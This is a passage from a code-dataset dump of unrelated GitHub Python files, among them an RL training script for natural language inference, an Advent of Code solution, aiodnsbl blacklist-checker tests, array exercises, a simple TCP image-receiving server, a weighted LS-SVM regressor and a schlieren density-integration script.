(no external \"lr\", for adam)\n critic_active_optimizer.param_groups[0]['lr'] = current_lr * shrink_factor # just for update\n critic_active_optimizer.param_groups[0]['lr'] = current_lr \n critic_active_optimizer.step()\n if RL_train:\n pass\n #actorModel.update_target_network()\n '''\n pred = predict.data.max(1)[1]\n correct += pred.long().eq(tgt_batch.data.long()).cpu().sum()\n assert len(pred) == len(s1[stidx:stidx + params.batch_size])\n\n # loss\n all_costs.append(avgloss/params.batch_size)\n words_count += (s1_batch.nelement() + s2_batch.nelement()) / params.word_emb_dim\n\n #print(nli_net.classifier[4].bias)\n\n 
if len(all_costs) == 100:\n logs.append('{0} ; loss {1} ; sentence/s {2} ; words/s {3} ; accuracy train : {4}'.format(\n stidx, round(np.mean(all_costs), 2),\n int(len(all_costs) * params.batch_size / (time.time() - last_time)),\n int(words_count * 1.0 / (time.time() - last_time)),\n round(100.*correct.item()/(stidx+k), 2)))\n print(logs[-1])\n last_time = time.time()\n words_count = 0\n all_costs = []\n '''\n \n if LSTM_train:\n nli_net.update_target_network()\n pred = predict.data.max(1)[1]\n correct += pred.long().eq(tgt_batch.data.long()).cpu().sum()\n assert len(pred) == len(s1[stidx:stidx + params.batch_size])\n\n # loss\n all_costs.append(avgloss/params.batch_size)\n words_count += (s1_batch.nelement() + s2_batch.nelement()) / params.word_emb_dim\n\n #print(nli_net.classifier[4].bias)\n\n if len(all_costs) == 100:\n logs.append('{0} ; loss {1} ; sentence/s {2} ; words/s {3} ; accuracy train : {4}'.format(\n stidx, round(np.mean(all_costs), 2),\n int(len(all_costs) * params.batch_size / (time.time() - last_time)),\n int(words_count * 1.0 / (time.time() - last_time)),\n round(100.*correct.item()/(stidx+k), 2)))\n print(logs[-1])\n last_time = time.time()\n words_count = 0\n all_costs = []\n else:\n nli_net.assign_target_network()\n pred = predict.data.max(1)[1]\n correct += pred.long().eq(tgt_batch.data.long()).cpu().sum()\n assert len(pred) == len(s1[stidx:stidx + params.batch_size])\n\n # loss\n all_costs.append(avgloss/params.batch_size)\n words_count += (s1_batch.nelement() + s2_batch.nelement()) / params.word_emb_dim\n\n \n\n if len(all_costs) == 100:\n logs.append('{0} ; loss {1} ; sentence/s {2} ; words/s {3} ; accuracy train : {4}'.format(\n stidx, round(np.mean(all_costs), 2),\n int(len(all_costs) * params.batch_size / (time.time() - last_time)),\n int(words_count * 1.0 / (time.time() - last_time)),\n round(100.*correct.item()/(stidx+k), 2)))\n print(logs[-1])\n last_time = time.time()\n words_count = 0\n all_costs = []\n if LSTM_train:\n train_acc = round(100 * correct.item()/len(s1), 2)\n print('results : epoch {0} ; mean accuracy train : {1}'.format(epoch, train_acc))\n return train_acc\n else:\n return None\n\ndef evaluate(epoch, eval_type='valid', final_eval=False):\n nli_net.eval()\n correct = 0.\n global val_acc_best, lr, stop_training, adam_stop\n\n if eval_type == 'valid':\n print('\\nVALIDATION : Epoch {0}'.format(epoch))\n\n if eval_type == \"train\":\n s1 = train['s1']\n s2 = train['s2']\n target = train['label']\n if eval_type == \"test\":\n s1 = test['s1']\n s2 = test['s2']\n target = test['label']\n if eval_type == \"valid\":\n s1 = valid['s1']\n s2 = valid['s2']\n target = valid['label']\n\n for i in range(0, len(s1), params.batch_size):\n # prepare batch\n s1_batch, s1_len = get_batch(s1[i:i + params.batch_size], word_vec, params.word_emb_dim)\n s2_batch, s2_len = get_batch(s2[i:i + params.batch_size], word_vec, params.word_emb_dim)\n s1_batch, s2_batch = Variable(s1_batch.cuda()), Variable(s2_batch.cuda())\n tgt_batch = Variable(torch.LongTensor(target[i:i + params.batch_size])).cuda()\n\n # model forward\n output = nli_net((s1_batch, s1_len), (s2_batch, s2_len), \"target\")\n\n pred = output.data.max(1)[1]\n correct += pred.long().eq(tgt_batch.data.long()).cpu().sum()\n\n # save model\n eval_acc = round(100 * correct.item() / len(s1), 2)\n if final_eval:\n print('finalgrep : accuracy {0} : {1}'.format(eval_type, eval_acc))\n else:\n print('togrep : results : epoch {0} ; mean accuracy {1} :\\\n {2}'.format(epoch, eval_type, eval_acc))\n\n if eval_type == 
'valid' and epoch <= params.n_epochs:\n if eval_acc > val_acc_best:\n print('saving model at epoch {0}'.format(epoch))\n if not os.path.exists(params.outputdir):\n os.makedirs(params.outputdir)\n torch.save(nli_net.state_dict(), os.path.join(params.outputdir,\n params.criticmodelname))\n val_acc_best = eval_acc\n else:\n if 'sgd' in params.optimizer:\n critic_active_optimizer.param_groups[0]['lr'] = critic_active_optimizer.param_groups[0]['lr'] / params.lrshrink\n print('Shrinking lr by : {0}. New lr = {1}'\n .format(params.lrshrink,\n critic_active_optimizer.param_groups[0]['lr']))\n if critic_active_optimizer.param_groups[0]['lr'] < params.minlr:\n stop_training = True\n if 'adam' in params.optimizer:\n # early stopping (at 2nd decrease in accuracy)\n stop_training = adam_stop\n adam_stop = True\n return eval_acc\n\ndef evaluate_RL(epoch, eval_type='valid', final_eval=False):\n nli_net.eval()\n actorModel.eval()\n correct = 0.\n global val_acc_best, lr, stop_training, adam_stop\n\n if eval_type == 'valid':\n print('\\nVALIDATION : Epoch {0}'.format(epoch))\n\n if eval_type == \"train\":\n s1 = train['s1']\n s2 = train['s2']\n target = train['label']\n if eval_type == \"test\":\n s1 = test['s1']\n s2 = test['s2']\n target = test['label']\n if eval_type == \"valid\":\n s1 = valid['s1']\n s2 = valid['s2']\n target = valid['label']\n\n ll, rl, ll_, rl_ = 0, 0, 0, 0\n deleteCount = dict()\n wordCount = dict()\n for i in range(0, len(s1)):\n if i % 100 == 0:\n print(\"Evaluating... \", i)\n # prepare batch\n s1_batch, s1_len = get_batch(s1[i:i + 1], word_vec, params.word_emb_dim)\n s2_batch, s2_len = get_batch(s2[i:i + 1], word_vec, params.word_emb_dim)\n s1_batch, s2_batch = Variable(s1_batch.cuda()), Variable(s2_batch.cuda())\n tgt_batch = Variable(torch.LongTensor(target[i:i + 1])).cuda()\n\n # model forward\n leftSummary = nli_net.summary((s1_batch, s1_len))[-1]\n rightSummary = nli_net.summary((s2_batch, s2_len))[-1]\n actions_left, states_left, Rinput_left, Rlength_left = Sampling_RL(s1_batch, rightSummary, int(s1_len), epsilon, Random=False)\n actions_right, states_right, Rinput_right, Rlength_right = Sampling_RL(s2_batch, leftSummary, int(s2_len), epsilon, Random=False)\n #print(s1_batch.size(), actions_left, Rinput_left.size(), s2_batch.size(), actions_right, Rinput_right.size(), \"\\n\\n\")\n output = nli_net((Rinput_left, np.array([Rlength_left])), (Rinput_right, np.array([Rlength_right])), scope = \"target\")\n\n pred = output.data.max(1)[1]\n\n if verbose:\n sourceL = s1[i:i + 1][0]\n sourceR = s2[i:i + 1][0]\n tempL, tempR = [], []\n \n for x in range(1,len(actions_left)-1):\n \n if sourceL[x] not in wordCount.keys():\n wordCount[sourceL[x]] = 1\n else:\n wordCount[sourceL[x]] += 1\n \n if actions_left[x] == 1:\n tempL.append(sourceL[x])\n if actions_left[x] == 0:\n if sourceL[x] not in deleteCount.keys():\n deleteCount[sourceL[x]] = 1\n else:\n deleteCount[sourceL[x]] += 1\n \n for x in range(1,len(actions_right)-1):\n \n if sourceR[x] not in wordCount.keys():\n wordCount[sourceR[x]] = 1\n else:\n wordCount[sourceR[x]] += 1\n\n if actions_right[x] == 1:\n tempR.append(sourceR[x])\n if actions_right[x] == 0:\n if sourceR[x] not in deleteCount.keys():\n deleteCount[sourceR[x]] = 1\n else:\n deleteCount[sourceR[x]] += 1\n \n with open(\"results.txt\", \"a\") as f:\n f.write(\" \".join(sourceL[1:-1]) + \"-----\" + \" \".join(sourceR[1:-1]) + \"\\n\")\n f.write(\" \".join(tempL) + \"-----\" + \" \".join(tempR) + \"\\nactual: \" + str(int(tgt_batch)) + \" pred: \" + str(int(pred)) + 
\"\\n\\n\")\n ll += len(actions_left)\n rl += len(actions_right)\n ll_ += Counter(actions_left)[1]\n rl_ += Counter(actions_right)[1] \n \n correct += pred.long().eq(tgt_batch.data.long()).cpu().sum()\n with open(\"results.txt\", \"a\") as f:\n f.write(\"Average left: \" + str(ll/len(s1)) + \"\\nAverage left new: \" + str(ll_/len(s1)) + \"\\nAverage right: \" + str(rl/len(s1)) + \"\\nAverage right new: \" + str(rl_/len(s1)))\n #f.write(deleteCount + \"\\n\\n\\n\" + wordCount)\n for key, value in sorted(deleteCount.items(), key=lambda item: item[1]):\n f.write(str(key) + \":\" + str(value) + \"\\n\")\n f.write(\"\\n\\n\\n\")\n for key, value in sorted(wordCount.items(), key=lambda item: item[1]):\n f.write(str(key) + \":\" + str(value) + \"\\n\")\n # save model\n eval_acc = round(100 * correct.item() / len(s1), 2)\n print(eval_type, \" accuracy: \", eval_acc)\n \n if final_eval:\n params.criticmodelname = bothCritic\n params.actormodelname = bothActor\n \n if eval_type == 'valid' and epoch <= params.n_epochs:\n if eval_acc > val_acc_best:\n print('saving model at epoch {0}'.format(epoch))\n if not os.path.exists(params.outputdir):\n os.makedirs(params.outputdir)\n torch.save(actorModel.state_dict(), os.path.join(params.outputdir, params.actormodelname))\n if final_eval:\n torch.save(nli_net.state_dict(), os.path.join(params.outputdir, params.criticmodelname))\n val_acc_best = eval_acc\n else:\n if final_eval:\n if 'sgd' in params.optimizer:\n critic_active_optimizer.param_groups[0]['lr'] = critic_active_optimizer.param_groups[0]['lr'] / params.lrshrink\n print('Shrinking lr by : {0}. New lr = {1}'\n .format(params.lrshrink,\n critic_active_optimizer.param_groups[0]['lr']))\n if critic_active_optimizer.param_groups[0]['lr'] < params.minlr:\n stop_training = True\n if 'adam' in params.optimizer:\n # early stopping (at 2nd decrease in accuracy)\n stop_training = adam_stop\n adam_stop = True\n return eval_acc\n\n\n\n\n''' INITIAL CRITIC TRAIN\n\"\"\"\nTrain model on Natural Language Inference task\n\"\"\"\nepoch = 1\nwhile not stop_training and epoch <= params.n_epochs:\n train_acc = trainepoch(epoch, RL_train = False)\n eval_acc = evaluate(epoch, 'valid')\n epoch += 1\n\n# Run best model on test set.\nnli_net.load_state_dict(torch.load(os.path.join(params.outputdir, params.criticmodelname)))\nprint(\"\\nCritic Loaded\")\nprint(evaluate(epoch, 'test'))\nprint(evaluate(epoch, 'valid'))\n'''\n\n'''\nprint(\"ACTOR TRAIN\")\nnli_net.load_state_dict(torch.load(os.path.join(params.outputdir, params.criticmodelname)))\nepoch = 1\nwhile not stop_training and epoch <= params.n_epochs:\n print(trainepoch(epoch, LSTM_train = False))\n eval_acc = evaluate_RL(epoch, 'valid')\n epoch += 1\n\nnli_net.load_state_dict(torch.load(os.path.join(params.outputdir, params.criticmodelname)))\nprint(\"\\nCritic Loaded\")\nactorModel.load_state_dict(torch.load(os.path.join(params.outputdir, params.actormodelname)))\nprint(\"\\nActor Loaded\")\n#print(evaluate_RL(epoch, 'train'))\n#print(evaluate_RL(epoch, 'test'))\nprint(evaluate_RL(epoch, 'test'))\n'''\n\nprint(\"FINAL CRITIC TRAIN\")\nnli_net.load_state_dict(torch.load(os.path.join(params.outputdir, params.criticmodelname)))\nprint(\"\\nCritic Loaded\")\nactorModel.load_state_dict(torch.load(os.path.join(params.outputdir, params.actormodelname)))\nprint(\"\\nActor Loaded\")\nepoch = 1\nwhile not stop_training and epoch <=params.n_epochs:\n train_acc = trainepoch(epoch)\n eval_acc = evaluate_RL(epoch, 'valid', final_eval = True)\n print(eval_acc)\n epoch += 
1\nnli_net.load_state_dict(torch.load(os.path.join(params.outputdir, bothCritic)))\nprint(\"\\nCritic Loaded\")\nactorModel.load_state_dict(torch.load(os.path.join(params.outputdir, bothActor)))\nprint(\"\\nActor Loaded\")\nprint(evaluate_RL(epoch, 'test'))\n\n\n","repo_name":"souvik491/RL-Final-Assignment","sub_path":"RL - Souvik Kundu/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":30488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7766735382","text":"from itertools import product\n\ndef parse_instructions(lines):\n instructions = []\n for line in lines:\n instruction = {}\n tokens = line.split()\n if tokens[0] == 'mask':\n instruction['type'] = 'mask'\n instruction['value'] = tokens[-1]\n else:\n address = tokens[0].split('[')[1].split(']')[0]\n instruction['type'] = 'mem'\n instruction['address'] = int(address)\n instruction['value'] = int(tokens[-1])\n instructions.append(instruction)\n\n return instructions\n\n\ndef apply_mask(mask_string, number):\n\n binary = list(bin(number)[2:].rjust(36, '0'))\n\n x_indices = []\n for (i, char) in enumerate(mask_string):\n if char == '1':\n binary[i] = '1'\n if char == 'X':\n x_indices.append(i)\n\n numbers = []\n if not len(x_indices):\n numbers.append(binary)\n\n combinations = [[0,1] for index in x_indices]\n combinations = product(*combinations)\n\n for combination in combinations:\n new_binary = binary.copy()\n for (i,value) in enumerate(combination):\n new_binary[x_indices[i]] = str(value)\n numbers.append(new_binary)\n\n return list(map(lambda x: int(x, 2), map(lambda x: \"\".join(x), numbers)))\n\n\ndef run(instructions, memory):\n current_mask = None\n for instruction in instructions:\n if instruction['type'] == 'mask':\n current_mask = instruction['value']\n else:\n addresses = apply_mask(current_mask, int(instruction['address']))\n for address in addresses:\n memory[address] = instruction['value']\n\n\nwith open('input', 'r') as f:\n lines = [line.strip() for line in f.readlines()]\n\ninstructions = parse_instructions(lines)\n\nmemory = {}\n\nrun(instructions, memory)\n\nprint(sum(memory.values()))\n","repo_name":"medvesekg/adventofcode2020","sub_path":"14/main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35337295884","text":"import pytest\n\nfrom aiodnsbl.checker import DNSBLChecker\nfrom aiodnsbl.providers import BASE_DOMAIN_PROVIDERS, BASE_PROVIDERS\n\n\n@pytest.mark.asyncio\nasync def test_checker():\n checker = DNSBLChecker()\n\n res = await checker.check(\"68.128.212.240\")\n assert res.blacklisted is True\n assert len(res.detected_by) > 0\n assert len(res.providers) == len(BASE_PROVIDERS)\n\n results = await checker.bulk_check([\"68.128.212.240\", \"8.8.8.8\"])\n assert len(results) == 2\n\n res = await checker.check(\"9.9.9.9\")\n assert res.blacklisted is False\n assert len(res.detected_by) == 0\n\n\n@pytest.mark.asyncio\nasync def test_checker_ipv6():\n checker = DNSBLChecker()\n res = await checker.check(\"2001:4860:4860::8844\")\n assert res.blacklisted is False\n\n\n@pytest.mark.asyncio\nasync def test_domain_checker():\n checker = DNSBLChecker()\n domain = \"example.com\"\n res = await checker.check(domain)\n assert res.blacklisted is False\n assert len(res.providers) == len(BASE_DOMAIN_PROVIDERS)\n\n\n@pytest.mark.asyncio\nasync def test_domain_idna():\n checker = DNSBLChecker()\n res = await 
checker.check(\"вуцхгйю.рф\")\n assert res.address == \"вуцхгйю.рф\"\n\n\n@pytest.mark.asyncio\nasync def test_domain_providers():\n checker = DNSBLChecker()\n res = await checker.check(\"google.com\")\n assert res.blacklisted is False\n\n\n@pytest.mark.asyncio\nasync def test_wrong_domain_format():\n invalid_inputs = [\"abc-\", \"8.8.8.256\"]\n for invalid_input in invalid_inputs:\n checker = DNSBLChecker()\n with pytest.raises(ValueError):\n await checker.check(invalid_input)\n\n\n@pytest.mark.asyncio\nasync def test_capitalization_in_domain():\n capitalized_domains = [\"Google.com\", \"Facebook.com\"]\n for domain in capitalized_domains:\n checker = DNSBLChecker()\n res = await checker.check(domain)\n assert res.blacklisted is False\n","repo_name":"ninoseki/aiodnsbl","sub_path":"tests/test_checker.py","file_name":"test_checker.py","file_ext":"py","file_size_in_byte":1903,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"18784246565","text":"# 5.0 Reorder List\ndef even_odd(A: list[int]) -> None:\n \"\"\"\n Reorder an integer list so that even entries appear first.\n \"\"\"\n next_even, next_odd = 0, len(A) - 1\n while next_even < next_odd:\n if A[next_even] % 2 == 0:\n next_even += 1\n else:\n A[next_even], A[next_odd] = A[next_odd], A[next_even]\n next_odd -= 1\n\n# 5.1 The Dutch National Flag Problem\ndef dutch_flag(A: list[int], pivot_idx: int) -> None:\n \"\"\"\n Takes an integer array, A, and an index, pivot_idx, and rearranges the elements such that all elements\n less than A[pivot_idx] (the \"pivot\") appear first, followed by elements equal to the pivot, followed\n by elements greater than the pivot.\n \"\"\"\n if len(A) < 2:\n return None\n\n if pivot_idx >= len(A):\n raise IndexError(\"Pivot index (idx) out of range.\")\n\n lesser = []\n equal = []\n greater = []\n for a in A:\n if a < A[pivot_idx]:\n lesser.append(a)\n elif a == A[pivot_idx]:\n equal.append(a)\n else:\n greater.append(a)\n \n lesser.extend(equal)\n lesser.extend(greater)\n\n for i in range(0,len(A)):\n A[i] = lesser[i]\n\ndef increment_array_integer(A: list[int]) -> None:\n \"\"\"\n Takes as input an array of digits encoding a nonnegative decimal integer D and updates\n the array to represent the integer D+1. 
For example, the input [1,2,9] is updated to\n [1,3,0]\n \"\"\"\n idx = len(A) - 1\n found = False\n\n while idx > -1 and found == False:\n if A[idx] < 9:\n A[idx] += 1\n found = True\n else:\n A[idx] = 0\n \n idx -= 1\n \n if idx == -1 and found == False:\n A.append(0)\n A[0] = 1\n","repo_name":"TommyHughes/eopi_python","sub_path":"arrays/exercises.py","file_name":"exercises.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26396373510","text":"import socket\n\nterminate_string = '-term-end-'\nBUFF_SIZE = 1024\n\nif __name__ == \"__main__\":\n server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server_socket.bind(('127.0.0.1', 8080))\n server_socket.listen(10)\n\n while True:\n (client_socket, server) = server_socket.accept()\n\n result = ''.encode('utf-8')\n\n while True:\n data = client_socket.recv(BUFF_SIZE)\n\n if data.find(terminate_string.encode('utf-8')) != -1:\n data = data.replace(terminate_string.encode('utf-8'), ''.encode('utf-8'))\n result += data\n break\n\n result += data\n if len(data) < BUFF_SIZE:\n break\n\n if result.find(terminate_string.encode('utf-8')) != -1:\n result = result.replace(terminate_string.encode('utf-8'), ''.encode('utf-8'))\n print(f'length of result: {len(result)}')\n\n sendData = f'received {len(result)} bytes' + terminate_string\n send_len = client_socket.send(sendData.encode('utf-8'))\n\n if send_len != len(sendData):\n print('error on send')\n\n with open('./4k_image_received.jpg', 'wb') as f:\n f.write(result)\n\n client_socket.close()\n","repo_name":"OptimistLabyrinth/socket_programming","sub_path":"python3_implementation/v3/server/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"23713249054","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Jun 5 09:30:24 2018\r\n\r\n@author: lj\r\n\"\"\"\r\nfrom numpy import *\r\n\r\ndef loadDataSet(filename):\r\n '''导入数据\r\n input: filename:文件名\r\n '''\r\n dataMat = []\r\n labelMat = []\r\n fr = open(filename)\r\n for line in fr.readlines():\r\n lineArr = line.strip().split('\\t')\r\n dataMat.append(float(lineArr[0]))\r\n labelMat.append(float(lineArr[1]))\r\n return mat(dataMat).T,mat(labelMat).T\r\n \r\n\r\ndef kernelTrans(X,A,kTup):\r\n '''数据集中每一个数据向量与A的核函数值\r\n input: X--特征数据集\r\n A--输入向量\r\n kTup--核函数参量定义\r\n output: K--数据集中每一个数据向量与A的核函数值组成的矩阵\r\n '''\r\n X = mat(X)\r\n m,n = shape(X)\r\n K = mat(zeros((m,1)))\r\n if kTup[0] == 'lin':\r\n K = X * A.T\r\n elif kTup[0] == 'rbf':\r\n for j in range(m):\r\n deltaRow = X[j] - A\r\n K[j] = deltaRow * deltaRow.T\r\n K = exp(K/(-1 * kTup[1] ** 2))\r\n else: raise NameError('Houston We Have a Problem ,That Kernel is not recognized')\r\n return K\r\n \r\nclass optStruct:\r\n def __init__(self,dataMatIn,classLabels,C,kTup):\r\n self.X = dataMatIn\r\n self.labelMat = classLabels\r\n self.C = C\r\n self.m = shape(dataMatIn)[0]\r\n self.alphas = mat(zeros((self.m,1)))\r\n self.b = 0\r\n self.K = mat(zeros((self.m,self.m))) #特征数据集合中向量两两核函数值组成的矩阵,[i,j]表示第i个向量与第j个向量的核函数值\r\n for i in range(self.m):\r\n self.K[:,i] = kernelTrans(self.X, self.X[i,:], kTup)\r\n \r\n\r\ndef leastSquares(dataMatIn,classLabels,C,kTup):\r\n '''最小二乘法求解alpha序列\r\n input:dataMatIn:特征数据集\r\n classLabels:分类标签集\r\n C:参数,(松弛变量,允许有些数据点可以处于分隔面的错误一侧)\r\n kTup: 核函数类型和参数选择 \r\n output:b--w.T*x+b=y中的b\r\n alphas:alphas序列 \r\n '''\r\n ##1.参数设置\r\n 
oS = optStruct(dataMatIn,classLabels,C,kTup)\r\n unit = mat(ones((oS.m,1))) #[1,1,...,1].T\r\n I = eye(oS.m)\r\n zero = mat(zeros((1,1)))\r\n upmat = hstack((zero,unit.T))\r\n downmat = hstack((unit,oS.K + I/float(C)))\r\n ##2.方程求解\r\n completemat = vstack((upmat,downmat)) #lssvm中求解方程的左边矩阵\r\n rightmat = vstack((zero,oS.labelMat)) # lssvm中求解方程的右边矩阵\r\n b_alpha = completemat.I * rightmat\r\n ##3.导出偏置b和Lagrange乘子序列\r\n oS.b = b_alpha[0,0]\r\n for i in range(oS.m):\r\n oS.alphas[i,0] = b_alpha[i+1,0]\r\n e = oS.alphas/C\r\n return oS.alphas,oS.b,e\r\n\r\ndef weights(e):\r\n '''计算权重序列\r\n input:e(mat):LSSVM误差矩阵\r\n output:v(mat):权重矩阵\r\n '''\r\n ##1.参数设置\r\n c1 = 2.5\r\n c2 = 3\r\n m = shape(e)[0]\r\n v = mat(zeros((m,1)))\r\n v1 = eye(m)\r\n q1 = int(m/4.0)\r\n q3 = int((m*3.0)/4.0)\r\n e1 = []\r\n shang = mat(zeros((m,1)))\r\n ##2.误差序列从小到大排列\r\n for i in range(m):\r\n e1.append(e[i,0])\r\n e1.sort()\r\n ##3.计算误差序列第三四分位与第一四分位的差\r\n IQR = e1[q3] - e1[q1]\r\n ##4.计算s的值\r\n s = IQR/(2 * 0.6745)\r\n ##5.计算每一个误差对应的权重\r\n for j in range(m):\r\n shang[j,0] = abs(e[j,0]/s)\r\n for x in range(m):\r\n if shang[x,0] <= c1:\r\n v[x,0] = 1.0\r\n if shang[x,0] > c1 and shang[x,0] <= c2:\r\n v[x,0] = (c2 - shang[x,0])/(c2 - c1)\r\n if shang[x,0] > c2:\r\n v[x,0] = 0.0001\r\n v1[x,x] = 1/float(v[x,0])\r\n return v1\r\n\r\ndef weightsleastSquares(dataMatIn,classLabels,C,kTup,v1):\r\n '''最小二乘法求解alpha序列\r\n input:dataMatIn:特征数据集\r\n classLabels:分类标签集\r\n C:参数,(松弛变量,允许有些数据点可以处于分隔面的错误一侧)\r\n kTup: 核函数类型和参数选择 \r\n output:b--w.T*x+b=y中的b\r\n alphas:alphas序列 \r\n '''\r\n ##1.参数设置\r\n oS = optStruct(dataMatIn,classLabels,C,kTup)\r\n unit = mat(ones((oS.m,1))) #[1,1,...,1].T\r\n #I = eye(oS.m)\r\n gamma = kTup[1]\r\n zero = mat(zeros((1,1)))\r\n upmat = hstack((zero,unit.T))\r\n downmat = hstack((unit,oS.K + v1/float(C)))\r\n ##2.方程求解\r\n completemat = vstack((upmat,downmat)) #lssvm中求解方程的左边矩阵\r\n rightmat = vstack((zero,oS.labelMat)) # lssvm中求解方程的右边矩阵\r\n b_alpha = completemat.I * rightmat\r\n ##3.导出偏置b和Lagrange乘子序列\r\n oS.b = b_alpha[0,0]\r\n for i in range(oS.m):\r\n oS.alphas[i,0] = b_alpha[i+1,0]\r\n e = oS.alphas/C\r\n return oS.alphas,oS.b\r\n\r\n\r\ndef predict(alphas,b,dataMat):\r\n '''预测结果\r\n input:alphas(mat):WLSSVM模型的Lagrange乘子序列\r\n b(float):WLSSVM模型回归方程的偏置\r\n dataMat(mat):测试样本集\r\n output:predict_result(mat):测试结果\r\n '''\r\n m,n = shape(dataMat)\r\n predict_result = mat(zeros((m,1)))\r\n for i in range(m):\r\n Kx = kernelTrans(dataMat,dataMat[i,:],kTup) #可以对alphas进行稀疏处理找到更准确的值 \r\n predict_result[i,0] = Kx.T * alphas + b \r\n return predict_result\r\n\r\ndef predict_average_error(predict_result,label):\r\n '''计算平均预测误差\r\n input:predict_result(mat):预测结果\r\n label(mat):实际结果\r\n output:average_error(float):平均误差\r\n '''\r\n m,n = shape(predict_result)\r\n error = 0.0\r\n for i in range(m):\r\n error += abs(predict_result[i,0] - label[i,0])\r\n average_error = error / m\r\n return average_error\r\n \r\n\r\n\r\nif __name__ == '__main__':\r\n ##1.数据导入\r\n print('--------------------Load Data------------------------')\r\n dataMat,labelMat = loadDataSet('sine.txt')\r\n ##2.参数设置\r\n print('--------------------Parameter Setup------------------')\r\n C = 0.6\r\n k1 = 0.3\r\n kernel = 'rbf'\r\n kTup = (kernel,k1)\r\n ##3.求解LSSVM模型\r\n print('-------------------Save LSSVM Model-----------------')\r\n alphas,b,e = leastSquares(dataMat,labelMat,C,kTup)\r\n ##4.计算误差权重\r\n print('----------------Calculate Error Weights-------------')\r\n v1 = weights(e)\r\n ##5.求解WLSSVM模型\r\n print('------------------Save WLSSVM 
Model--------------- -')\r\n alphas1,b1 = weightsleastSquares(dataMat,labelMat,C,kTup,v1)\r\n ##6.预测结果\r\n print('------------------Predict Result------------------ -')\r\n predict_result = predict(alphas1,b1,dataMat)\r\n ##7.平均误差\r\n print('-------------------Average Error------------------ -')\r\n average_error = predict_average_error(predict_result,labelMat)\r\n \r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"shiluqiang/WLSSVM_python","sub_path":"wlssvm.py","file_name":"wlssvm.py","file_ext":"py","file_size_in_byte":6856,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"32"} +{"seq_id":"26006455408","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport matplotlib\n# matplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nfrom scipy.io import savemat\nfrom scipy.io import loadmat\nimport timeit\n\n# import density integration functions\nfrom DensityIntegrationUncertaintyQuantification import Density_integration_Poisson_uncertainty\nfrom DensityIntegrationUncertaintyQuantification import Density_integration_WLS_uncertainty\n\nimport loadmat_functions\n\nimport helper_functions\n\ndef main():\n \n # file containing displacements and uncertainties\n filename = 'sample-displacements.mat'\n \n # displacement estimation method ('c' for correlation and 't' for tracking)\n displacement_estimation_method = 'c'\n \n # displacement uncertainty method ('MC' for correlation and 'crlb' for tracking)\n displacement_uncertainty_method = 'MC'\n\n # set integration method ('p' for poisson or 'w' for wls)\n density_integration_method = 'w'\n \n # dataset type (syntehtic or experiment)\n dataset_type = 'synthetic'\n\n # -------------------------------------------------\n # experimental parameters for density integration\n # -------------------------------------------------\n experimental_parameters = dict()\n\n # ambient/reference density (kg/m^3)\n experimental_parameters['rho_0'] = 1.225\n\n # uncertainty in the reference density (kg/m^3) (MUST BE GREATER THAN 0)\n experimental_parameters['sigma_rho_0'] = 1e-10\n\n # gladstone dale constant (m^3/kg)\n experimental_parameters['gladstone_dale'] = 0.225e-3\n\n # ambient refractive index\n experimental_parameters['n_0'] = 1.0 + experimental_parameters['gladstone_dale'] * experimental_parameters['rho_0']\n\n # thickness of the density gradient field (m)\n experimental_parameters['delta_z'] = 0.01\n\n # distance between lens and dot target (object / working distance) (m)\n experimental_parameters['object_distance'] = 1.0\n\n # distance between the mid-point of the density gradient field and the dot pattern (m)\n experimental_parameters['Z_D'] = 0.25\n\n # distance between the mid-point of the density gradient field and the camera lens (m)\n experimental_parameters['Z_A'] = experimental_parameters['object_distance'] - experimental_parameters['Z_D']\n \n # distance between the dot pattern and the camera lens (m)\n experimental_parameters['Z_B'] = experimental_parameters['object_distance']\n\n # origin (pixels)\n experimental_parameters['x0'] = 256 \n experimental_parameters['y0'] = 256 \n\n # size of a pixel on the camera sensor (m)\n experimental_parameters['pixel_pitch'] = 10e-6\n\n # focal length of camera lens (m)\n experimental_parameters['focal_length'] = 105e-3\n\n # non-dimensional magnification of the dot pattern (can also set it directly)\n experimental_parameters['magnification'] = experimental_parameters['focal_length'] / (\n experimental_parameters['object_distance'] - 
experimental_parameters['focal_length'])\n\n # uncertainty in magnification\n experimental_parameters['sigma_M'] = 0.1\n\n # uncertainty in Z_D (m)\n experimental_parameters['sigma_Z_D'] = 1e-3\n\n\n # non-dimensional magnification of the mid-z-PLANE of the density gradient field\n experimental_parameters['magnification_grad'] = experimental_parameters['magnification'] \\\n * experimental_parameters['Z_B'] / experimental_parameters['Z_A']\n \n # --------------------------\n # processing\n # --------------------------\n # load displacements and uncertainties from file \n if displacement_estimation_method == 'c':\n # correlation\n X_pix, Y_pix, U, V, sigma_U, sigma_V, Eval = helper_functions.load_displacements_correlation(filename, displacement_uncertainty_method) \n elif displacement_estimation_method == 't':\n # tracking\n X_pix, Y_pix, U, V, sigma_U, sigma_V = helper_functions.load_displacements_tracking(filename, experimental_parameters['dot_spacing'], displacement_uncertainty_method) \n\n # account for sign convention\n if dataset_type == 'synthetic':\n U *= -1\n V *= -1\n\n # create mask array (1 for flow, 0 elsewhere) - only implemented for Correlation at the moment\n if displacement_estimation_method == 'c':\n mask = helper_functions.create_mask(X_pix.shape[0], X_pix.shape[1], Eval)\n elif displacement_estimation_method == 't': \n mask = np.ones_like(a=U)\n\n # convert displacements to density gradients and co-ordinates to physical units \n X, Y, rho_x, rho_y, sigma_rho_x, sigma_rho_y = helper_functions.convert_displacements_to_physical_units(X_pix, Y_pix, U, V, sigma_U, sigma_V, experimental_parameters, mask)\n\n # define dirichlet 